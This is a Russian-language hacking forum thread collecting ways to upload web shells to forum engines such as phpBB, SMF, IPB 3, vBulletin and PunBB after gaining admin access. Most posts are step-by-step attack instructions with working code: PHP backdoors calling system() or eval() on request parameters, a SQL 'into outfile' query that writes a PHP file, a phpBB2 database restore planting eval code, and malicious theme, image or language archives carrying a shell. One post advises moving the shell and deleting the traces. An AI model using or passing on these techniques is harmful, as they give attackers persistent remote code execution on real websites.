Старый 02.07.2010, 19:28   #1
Ded MustD!e
Banned
 
Регистрация: 01.07.2010
Сообщений: 162
По умолчанию Заливка шелла в форумы

Собираем в одном месте способы заливки шелла в различные форумы.

Последний раз редактировалось Ded MustD!e; 02.07.2010 в 21:15..
Ded MustD!e вне форума   Ответить с цитированием
Старый 07.07.2010, 02:43   #2
Shadow
 
Регистрация: 02.07.2010
Сообщений: 35
Репутация: 55
По умолчанию PHPBB3

Заливка шела через темплейты в phpBB3(необходим доступ в админку).

1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates).
2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции:
Код:
<!-- PHP -->
    system($_REQUEST[c]);
<!-- ENDPHP -->
Shadow вне форума   Ответить с цитированием
Старый 07.07.2010, 16:58   #3
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Заливка шелла в SMF 1.1.8 (возможно более рание и поздние версии) из админпанели:

у себя на компе предварительно суем обычный шелл в обычный .zip-архив (можно через тот же winrar, просто выбрать тип архива .zip)

например шелл называется wso.php, получили архив wso.zip

Идем в админку:

Код:
http://site.com/index.php?action=admin
Configuration->Themes and Layout->Install a New Theme->выбираем наш wso.zip->Install

и шелл будет по адресу:

Код:
http://site.com/Themes/wso/wso.php
т.е. очевидно, что в папке Themes создается папка wso (по имени архива) и в нее распаковывается содержимое архива
Pashkela вне форума   Ответить с цитированием
Старый 08.01.2011, 10:14   #4
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
Заливка шелла в SMF 1.1.8 (возможно более рание и поздние версии) из админпанели:

у себя на компе предварительно суем обычный шелл в обычный .zip-архив (можно через тот же winrar, просто выбрать тип архива .zip)

например шелл называется wso.php, получили архив wso.zip

Идем в админку:

Код:
http://site.com/index.php?action=admin
Configuration->Themes and Layout->Install a New Theme->выбираем наш wso.zip->Install

и шелл будет по адресу:

Код:
http://site.com/Themes/wso/wso.php
т.е. очевидно, что в папке Themes создается папка wso (по имени архива) и в нее распаковывается содержимое архива

Иногда при таком способе шелл не открывается. Идем в раздел Packages->Options->Cleanup permissions->"All files are writable". Радуемся
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 07.07.2010, 16:58   #5
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Залитие шелла в IPB 3 из админпанели (тестилось на IPB 3.0.1 nulled):

способ 1:

вариант1:

Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

полный путь можно посмотреть так:

->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO

шелл:
Код:
http://site.com/uploads/shell.php
PS: Нужны соответствующие права

вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

Код:
http://site.com/index.php?app=core&module=usercp&tab=members&area=avatar
грузим аву-шелл с расширением php3 и получаем шелл по адресу:

Код:
http://site.ru/uploads/av-1.php3
=============================

способ 2:

Залитие шелла из админки IPB 3... (тестилось на IPB 3.0.1 nulled и 3.0.2-лицуха):

1. Ставим себе на локалхост IPB 3.0.1 к примеру нуленый

2. Идем в админку - Внешний вид - IP.Board - Настройки - смотрим "Директория с изображениями" - по дефолту "public/style_images/master"

3. Идем в нашу папочку (на примере Denwer)

Код:
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master
и суем туда наш любимый wso2.php

4. Админка - Внешний вид - Импорт / Экспорт - Экспорт - Экспорт изображений - Какие изображения экспортировать? - IP.Board - Экспорт изображений - получаем архив images-master.xml.gz

5. В архиве файлик images-master.xml

Переименовываем архив! таким образом - обязательная процедура, иначе при попытке импорта на целевом сайте изображений стиля напишет "папка public/style_images/master уже существует!" - images-master2.xml.gz, название файлика в архиве сменится автоматом

6. Админка - Внешний вид - Импорт / Экспорт - Импорт - Импорт изображений - Загрузка XML-архива с изображениями - Обзор - images-master2.xml.gz - Импорт изображений

Рядом с

Код:
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master
появится

Код:
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master2
где будет лежать все тоже самое, плюс наш шелл

в итоге шелл будет по адресу:

Код:
http://forum.site.ru/public/style_images/master2/wso2.php
PS: не забудьте потом переместить шелл и удалить каталог master2

Готовый архив с картинками и шеллом можно взять тут , останется только изменить циферку

Последний раз редактировалось Pashkela; 06.04.2015 в 21:58..
Pashkela вне форума   Ответить с цитированием
Старый 04.12.2011, 15:46   #6
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
Залитие шелла в IPB 3 из админпанели (тестилось на IPB 3.0.1 nulled):

способ 1:

вариант1:

Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

полный путь можно посмотреть так:

->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO

шелл:
Код:
http://site.com/uploads/shell.php
PS: Нужны соответствующие права

вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

Код:
http://site.com/index.php?app=core&module=usercp&tab=members&area=avatar
грузим аву-шелл с расширением php3 и получаем шелл по адресу:

Код:
http://site.ru/uploads/av-1.php3
=============================

способ 2:

Залитие шелла из админки IPB 3... (тестилось на IPB 3.0.1 nulled и 3.0.2-лицуха):

1. Ставим себе на локалхост IPB 3.0.1 к примеру нуленый

2. Идем в админку - Внешний вид - IP.Board - Настройки - смотрим "Директория с изображениями" - по дефолту "public/style_images/master"

3. Идем в нашу папочку (на примере Denwer)

Код:
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master
и суем туда наш любимый wso2.php

4. Админка - Внешний вид - Импорт / Экспорт - Экспорт - Экспорт изображений - Какие изображения экспортировать? - IP.Board - Экспорт изображений - получаем архив images-master.xml.gz

5. В архиве файлик images-master.xml

Переименовываем архив! таким образом - обязательная процедура, иначе при попытке импорта на целевом сайте изображений стиля напишет "папка public/style_images/master уже существует!" - images-master2.xml.gz, название файлика в архиве сменится автоматом

6. Админка - Внешний вид - Импорт / Экспорт - Импорт - Импорт изображений - Загрузка XML-архива с изображениями - Обзор - images-master2.xml.gz - Импорт изображений

Рядом с

Код:
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master
появится

Код:
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master2
где будет лежать все тоже самое, плюс наш шелл

в итоге шелл будет по адресу:

Код:
http://forum.site.ru/public/style_images/master2/wso2.php
PS: не забудьте потом переместить шелл и удалить каталог master2

Готовый архив с картинками и шеллом можно взять тут , останется только изменить циферку
v2.3.6

Сработал вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

Код:
http://site.com/index.php?app=core&module=usercp&tab=members&area=avatar
грузим аву-шелл с расширением php3 и получаем шелл по адресу:

Код:
http://site.ru/uploads/av-1.php3
}{оттабыч вне форума   Ответить с цитированием
Старый 11.07.2010, 17:00   #7
Scorpius
 
Аватар для Scorpius
 
Регистрация: 09.07.2010
Сообщений: 6
Репутация: 0
Exclamation Заливка шелла в phpBB 2

Заливка шелла в phpBB 2.*


1. Создаём файл ex.sql
2. Прописываем туда
Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;
Где user_id=2 - идентификатор администратора

3. Заходим в админ-панель
4. В админ-панеле выбираем пункт "Восстановить БД" и загружаем ex.sql
5. Выполняем код / Заливаем шелл так

Код:
http://target/profile.php?mode=editprofile&e=phpinfo();
Scorpius вне форума   Ответить с цитированием
Старый 19.07.2010, 17:48   #8
Ded MustD!e
Banned
 
Регистрация: 01.07.2010
Сообщений: 162
По умолчанию

Заливка шелла в vBulletin.

В админке: Plugins & Products -> Plugin Manager -> [Add New Plugin]

вписываем eval($_REQUEST[cmd]); в любой темплейт, например в faq_complete, Plugin is Active выставляем "Yes" и сохраняем

шелл будет тут:
Код:
http://localhost/forum/faq.php?cmd=phpinfo();

Последний раз редактировалось Ded MustD!e; 19.07.2010 в 17:57..
Ded MustD!e вне форума   Ответить с цитированием
Старый 23.07.2010, 13:18   #9
it's my
 
Регистрация: 06.07.2010
Сообщений: 39
Репутация: 11
По умолчанию

Заливка шелла в PunBB 1.2.17
admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz
шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)
it's my вне форума   Ответить с цитированием
Старый 26.06.2012, 23:11   #10
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Цитата:
Сообщение от it's my Посмотреть сообщение
Заливка шелла в PunBB 1.2.17
admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz
шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)

Для версии 1.2.20 есть что-то? Указанный способ не подходит в виду отсутствия packager
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра
Комбинированный вид Комбинированный вид

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot